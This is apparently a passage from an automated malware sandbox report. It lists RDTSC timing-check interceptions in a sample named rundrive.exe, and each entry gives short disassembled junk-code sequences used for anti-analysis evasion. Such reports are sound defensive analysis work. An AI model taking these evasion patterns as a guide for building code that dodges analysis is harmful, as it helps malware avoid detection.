                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C936F second address: 5C9380 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9380 second address: 5C9384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C95C2 second address: 5C95C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C95C6 second address: 5C95CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9A22 second address: 5C9A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9A27 second address: 5C9A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FDA80C026C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9A46 second address: 5C9A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDA80C00889h 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9E0D second address: 5C9E1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FDA80C026B6h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5C9E1E second address: 5C9E24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F6AC7 second address: 5F6ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5F6ACD second address: 5F6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FD1ED second address: 5FD1FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDA80C026B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FBEE3 second address: 5FBEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC082 second address: 5FC09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026C7h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC09D second address: 5FC0AD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C00876h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC1FF second address: 5FC209 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC209 second address: 5FC20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC20F second address: 5FC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC36A second address: 5FC36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC4A3 second address: 5FC4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC4AE second address: 5FC4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA80C00876h 0x0000000a jnc 00007FDA80C00876h 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC642 second address: 5FC66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDA80C026B6h 0x0000000a popad 0x0000000b jnl 00007FDA80C026CFh 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FC66C second address: 5FC68A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C0087Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007FDA80C00876h 0x00000010 popad 0x00000011 jo 00007FDA80C0087Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FCBEC second address: 5FCBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5FCBF2 second address: 5FCC0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 609C45 second address: 609C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026BEh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 609C57 second address: 609C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00884h 0x00000007 jl 00007FDA80C00876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FDA80C00882h 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 608A4D second address: 608A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 608A5C second address: 608A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 608C1A second address: 608C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 608F62 second address: 608F67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 608F67 second address: 608F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 609379 second address: 60937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60937E second address: 6093B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FDA80C026BCh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDA80C026C8h 0x00000012 jp 00007FDA80C026B6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60969A second address: 60969F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60969F second address: 6096C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 push edx 0x00000008 jmp 00007FDA80C026BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 609939 second address: 60996F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDA80C0087Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jp 00007FDA80C00876h 0x00000013 jmp 00007FDA80C0087Dh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e jmp 00007FDA80C0087Bh 0x00000023 pushad 0x00000024 push edx 0x00000025 pop edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FFA0 second address: 60FFB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FFB0 second address: 60FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FFB4 second address: 60FFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FA1D second address: 60FA23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FB77 second address: 60FB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 60FB7B second address: 60FB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FDA80C00888h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 616B04 second address: 616B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FDA80C026C2h 0x0000000a jl 00007FDA80C026B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6156D6 second address: 6156DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6156DA second address: 6156E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6156E6 second address: 6156F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FDA80C00876h 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 5C9831 second address: 5C9835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 5C9835 second address: 5C9854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jc 00007FDA80C00891h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDA80C0087Fh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 5C9854 second address: 5C9858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 5C9858 second address: 5C9899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D2E47h] 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FDA80C00878h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+122D1F59h] 0x0000002f cld 0x00000030 nop 0x00000031 pushad 0x00000032 jp 00007FDA80C00878h 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 5C9899 second address: 5C989D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 615C83 second address: 615C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 615C8A second address: 615CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDA80C026C8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 615CC2 second address: 615CC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6167EF second address: 616801 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 jnp 00007FDA80C026BEh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61AC64 second address: 61AC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61AC71 second address: 61AC7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61AC7D second address: 61AC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61AF2A second address: 61AF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FDA80C026B6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61AF38 second address: 61AF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61B099 second address: 61B09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61B09D second address: 61B0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61E538 second address: 61E543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61E543 second address: 61E547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61E547 second address: 61E54B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 61E54B second address: 61E566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDA80C00880h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 625D7E second address: 625D90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F55 second address: 623F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F5B second address: 623F86 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA80C026B6h 0x00000008 jmp 00007FDA80C026C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FDA80C026BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F86 second address: 623F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F8A second address: 623F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F90 second address: 623F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623F9C second address: 623FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623FA0 second address: 623FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 623FA4 second address: 623FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDA80C026C7h 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62475F second address: 62476E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FDA80C00876h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 624C43 second address: 624C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 624C47 second address: 624C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00884h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007FDA80C00876h 0x00000012 jne 00007FDA80C00876h 0x00000018 jmp 00007FDA80C00884h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 624C83 second address: 624C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDA80C026B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6257F9 second address: 6257FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6257FF second address: 625805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 625805 second address: 62580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62580A second address: 625849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C2h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jmp 00007FDA80C026BCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDA80C026C0h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 625849 second address: 62584D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 629EFD second address: 629F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A049 second address: 62A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDA80C00876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A055 second address: 62A06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDA80C026BEh 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A58C second address: 62A5C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FDA80C00878h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FDA80C00888h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A5C2 second address: 62A5C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A787 second address: 62A79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FDA80C00876h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FDA80C00876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
